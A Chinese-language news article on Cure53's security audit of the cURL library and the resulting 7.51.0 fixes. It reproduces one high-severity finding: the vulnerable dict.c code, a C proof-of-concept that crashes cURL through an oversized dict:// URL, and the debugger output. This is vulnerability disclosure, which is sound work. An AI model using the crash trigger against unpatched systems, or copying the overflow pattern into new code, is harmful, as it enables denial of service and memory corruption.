[[177943]]

安全專家對cURL進行了審計，發現了數十個安全問題，這些漏洞在最新的版本中已經被修復。

cURL想必大家都不陌生，它是一款開源的命令行工具和庫，支持多種協議傳輸數據。cURL如今的應用還是比較廣泛的，包括網絡設備、打印機、智能手機，甚至是一些物聯網設備比如汽車。

主動審計

前不久，cURL開發者、Mozilla員工Daniel Stenberg請Mozilla Secure Open Source(SOS)項目對cURL進行安全審計。

“我請Mozilla Secure Open Source項目進行了一次安全審計。這個項目是由Mozilla尋找第三方公司一起參與，并且最終買單完成的。參與審計的公司名為Cure53。” Stenberg在博客中寫道。“我之所以申請審計是因為最近我感覺存在一些安全相關的問題，我覺得我們在安全方面可能有所欠缺，所以想讓專家們檢查一下。”

Cure53的5名專家對cURL進行了為期20天的審計，發現了總共23個安全問題。

審計結果

這些安全問題中，有9個是安全漏洞。專家融合了其中2個安全漏洞——其中一個被歸類為“plain bug”，因為要在實際攻擊場景進行利用會很困難。另外，審計發現了4個高危漏洞和4個中危漏洞。

高危漏洞的漏洞編號為CVE-2016-8617, CVE-2016-8619, CVE-2016-8622和CVE-2016-8623。這些都是遠程執行漏洞。

比如說下面這個漏洞：

CRL-01-014 unescape_word()整型溢出造成負數數組索引(高危)

dict.c中的unescape_word()函數中存在以下代碼：

static char *unescape_word(struct Curl_easy *data, const char *inputbuff) 
       { 
         char *newp; 
         char *dictp; 
         char *ptr; 
         int len; 
         char ch; 
         int olen=0; 
         newp = curl_easy_unescape(data, inputbuff, 0, &len); 
         if(!newp) 
return NULL; 
         dictp = malloc(((size_t)len)*2 + 1); /* add one for terminating zero */ 
         if(dictp) { 
           /* According to RFC2229 section 2.2, these letters need to be escaped with 
              \[letter] */ 
           for(ptr = newp; 
               (ch = *ptr) != 0; 
               ptr++) { 
             if((ch <= 32) || (ch == 127) || 
                 (ch == '\'') || (ch == '\"') || (ch == '\\')) { 
               dictp[olen++] = '\\'; 
             } 
             dictp[olen++] = ch; 
           } 
           dictp[olen]=0; 
         } 
free(newp); 
         return dictp; 
       } 

很明顯，len要比pow(2,31)小，但是輸出可以拓展至兩倍大小，也就是說當olen的值是INT_MAX時，可以被增加。這就會導致有符號整型溢出。

由于olen一直被用作數組索引，負的數組索引就會指向未分配的內存。

要驗證漏洞，可以在6GB以上空閑內存的64位電腦上運行下面的代碼。這個測試會獲取一個超過1GB長的dict:// URL。

#include <curl/curl.h> 
#include <stdint.h> 
#include <string.h> 
#include <err.h> 
#include <stdlib.h> 
int main(int argc, char *argv[]) 
{ 
  char *dicturl = malloc(23 + (1ULL<<30) + 5 + 1); 
  if (!dicturl) 
    errx(1, "malloc"); 
  strcpy(dicturl, "dict://localhost/MATCH:"); 
  memset(dicturl + 23, '\"', (1ULL<<30) + 5); 
  dicturl[23 + (1ULL<<30) + 5] = '\0'; 
  CURL *hnd = curl_easy_init(); 
  curl_easy_setopt(hnd, CURLOPT_URL, dicturl); 
  free(dicturl); 
  curl_easy_setopt(hnd, CURLOPT_NOPROGRESS, 1L); 
  CURLcode ret = curl_easy_perform(hnd); 
  curl_easy_cleanup(hnd); 
  return (int)ret; 
} 

運行會導致如下的崩潰信息：

$ gdb ./negative_dict_url 
[...] 
(gdb) run 
Starting program: [...] 
[...] 
Program received signal SIGSEGV, Segmentation fault. 
0x00007ffff7b6975b in unescape_word (data=0x63a0b0, inputbuff=0x7fffb0fca017 '\"' <repeats 200 times>...) at dict.c:116 
116 dictp[olen++] = '\\'; 
(gdb) x/1i $pc 
=> 0x7ffff7b6975b <unescape_word+170>: mov 
(gdb) print/x $rax 
$1 = 0x7ffdf0dba010 
(gdb) print/x dictp 
$2 = 0x7ffe70dba010 
(gdb) print olen 
$3 = -2147483647 

但實際上，審計報告提到，cURL庫的整體安全性和魯棒性都很好。

也請大家不要擔心，新版本的cURL已經上線了，7.51.0版本修復了總共11個漏洞，其中7個是由Cure53的審計團隊發現的，其他的漏洞是由Luật Nguyễn、Christian Heimes和Fernando Muñoz提交的。

Stenberg指出，cURL是一個非常常用的軟件，因此，審計對用戶來說具有重大意義。

“由于curl是世界上最常用的軟件，因此curl如果出現了問題可能對各種工具、設備、應用造成重大影響。我們不希望發生那樣的事。”